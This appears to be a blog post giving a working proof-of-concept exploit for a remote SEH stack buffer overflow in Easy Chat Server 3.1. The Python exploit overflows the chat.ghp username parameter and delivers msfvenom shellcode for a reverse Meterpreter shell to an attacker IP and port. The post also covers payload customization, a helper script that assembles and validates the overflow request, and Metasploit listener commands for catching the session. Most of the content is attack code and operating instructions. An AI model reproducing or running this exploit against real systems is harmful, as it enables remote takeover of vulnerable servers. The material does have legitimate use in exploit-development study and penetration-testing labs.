Easy Chat Server 3.1 SEH Exploit

Published on June 19, 2025


This proof-of-concept demonstrates a remote stack buffer overflow via SEH overwrite in Easy Chat Server 3.1, spawning a reverse Meterpreter shell. We’ll walk through the exploit code, how the payload is customized, and how to set up your listener.

POC Exploit Code


#!/usr/bin/python3
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)

import sys
import socket
from struct import pack

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} <victim-ip> <port>")
    sys.exit(1)

host = sys.argv[1]       # Victim IP
port = int(sys.argv[2])  # Victim Port

# Stack layout after the overflow: 217 bytes of filler reach the SEH record,
# whose first dword (nSEH) is followed by the exception handler pointer (SEH).
junk = b"A" * 217
nseh = pack("<L", 0x06eb9090)  # nop, nop, jmp short +6: hops over the SEH record into the NOP sled
seh  = pack("<L", 0x1001ae86)  # pop pop ret from SSLEAY32.DLL: returns execution into nseh

# shellcode generated with msfvenom:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 \
#           -f python -b "\x00\x20" -v shellcode
shellcode = b"\x90" * 16  # NOP sled; the short jump lands two bytes into it
shellcode += b"\xdb\xc9\xbd\x60\xe7\xba\x69\xd9\x74\x24\xf4"
# … [rest of shellcode truncated for brevity] …

# The overflow is triggered through the username parameter of chat.ghp.
buffer = (
    b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode +
    b"&password=&room=1&sex=1 HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0\r\n"
    b"Host: " + host.encode() + b":" + str(port).encode() + b"\r\n"
    b"Accept-Language: en-us\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)

print("[*] Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(buffer)  # sendall() loops until the whole request has been written
s.close()
print("[+] Done!")


Payload Customization

The shellcode above was generated with msfvenom for the windows/meterpreter/reverse_tcp payload. To adapt it to your own lab:

  • Set LHOST to the IP of your attacking VM (192.168.0.162 in the listing).
  • Set LPORT to the port your handler will listen on (1990 in the listing).
  • Keep excluding the bad characters \x00 and \x20 (the -b "\x00\x20" option): a null byte ends the string when the server copies it and a space ends the request URI, so either one truncates the payload. Verify the bad-character set against the target before trusting a freshly generated payload.
  • Leave junk (217 bytes), nseh and seh alone unless you are targeting a different version or build; the offset to the SEH record and the pop/pop/ret address in SSLEAY32.DLL were found against the tested build and need to be re-derived in a debugger for any other one.
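The layout the exploit relies on (filler, nSEH, SEH, NOP sled, shellcode) is easy to get subtly wrong when the offsets change, so the following added example, which is not the original exploit, builds that layout from its parts and checks it before anything is sent: it encodes the short jump instead of hardcoding 0x06eb9090, computes where the jump lands and confirms it falls inside the NOP sled, scans the result for the bad characters, and wraps it in the same GET /chat.ghp request. The 217-byte offset, the pop/pop/ret address 0x1001ae86 and the bad-character set are taken from the listing above; the shellcode is a constructed int3 placeholder and the host/port in the demo run are made up.

```python
# Added example (not the original exploit): assemble and sanity-check the SEH
# overwrite layout used above. Offsets and the pop/pop/ret address come from
# the listing; the shellcode here is a constructed placeholder (int3 bytes).
from struct import pack

BAD_CHARS = b"\x00\x20"  # the characters excluded with msfvenom -b above


def short_jmp(distance):
    """Contents of the 4-byte nSEH slot: two NOPs, then 'jmp short rel8' (EB xx).

    `distance` is relative to the end of the jmp instruction, i.e. to the
    start of the SEH dword that immediately follows nSEH.
    """
    if not -128 <= distance <= 127:
        raise ValueError("short jump displacement must fit in a signed byte")
    return b"\x90\x90\xeb" + pack("<b", distance)


def build_seh_payload(junk_len, ppr_addr, shellcode, sled_len=16, distance=6):
    """junk | nSEH | SEH | NOP sled | shellcode, exactly as the exploit lays it out."""
    nseh = short_jmp(distance)
    seh = pack("<L", ppr_addr)  # little-endian pointer to the pop/pop/ret gadget
    return b"A" * junk_len + nseh + seh + b"\x90" * sled_len + shellcode


def jmp_landing(junk_len, distance=6):
    """Payload offset the nSEH jump lands on: nSEH starts at junk_len,
    the jmp ends 4 bytes later, then the displacement is added."""
    return junk_len + 4 + distance


def lands_in_sled(junk_len, sled_len=16, distance=6):
    """True if the jump lands inside the NOP sled that follows the 8-byte SEH record."""
    sled_start = junk_len + 8
    sled_end = sled_start + sled_len
    return sled_start <= jmp_landing(junk_len, distance) < sled_end


def find_bad_chars(data, bad=BAD_CHARS):
    """Offsets of every bad character in `data`; an empty list means clean."""
    return [i for i, b in enumerate(data) if b in bad]


def build_request(host, port, payload):
    """Wrap the payload in the same GET /chat.ghp request the exploit sends."""
    return (
        b"GET /chat.ghp?username=" + payload +
        b"&password=&room=1&sex=1 HTTP/1.1\r\n"
        b"User-Agent: Mozilla/4.0\r\n"
        b"Host: " + host.encode() + b":" + str(port).encode() + b"\r\n"
        b"Accept-Language: en-us\r\n"
        b"Connection: Keep-Alive\r\n\r\n"
    )


if __name__ == "__main__":
    placeholder = b"\xcc" * 4  # constructed stand-in for the msfvenom shellcode
    payload = build_seh_payload(217, 0x1001ae86, placeholder)
    assert payload[217:221] == pack("<L", 0x06eb9090)  # same nSEH as the listing
    assert lands_in_sled(217)                           # lands at 227, sled spans 225..240
    assert not find_bad_chars(payload)                  # no \x00 or \x20 in what we send
    # "127.0.0.1" / 80 are constructed values for the demo run only.
    print(build_request("127.0.0.1", 80, payload)[:48])
```

Run the checks against the real msfvenom output by replacing `placeholder` with the generated `shellcode` variable; `find_bad_chars` should still return an empty list, and `lands_in_sled` is the first thing to re-check after changing the junk length or the jump displacement for another build.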

Setting Up the Listener

Use Metasploit's multi/handler to catch the reverse Meterpreter connection. Start it before running the exploit script, since the shellcode connects back as soon as it executes, and make sure LHOST and LPORT match the values the shellcode was generated with:


msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.162
set LPORT 1990
exploit


Once the script has sent the buffer and the server has executed the shellcode, a Meterpreter session opens in the handler.
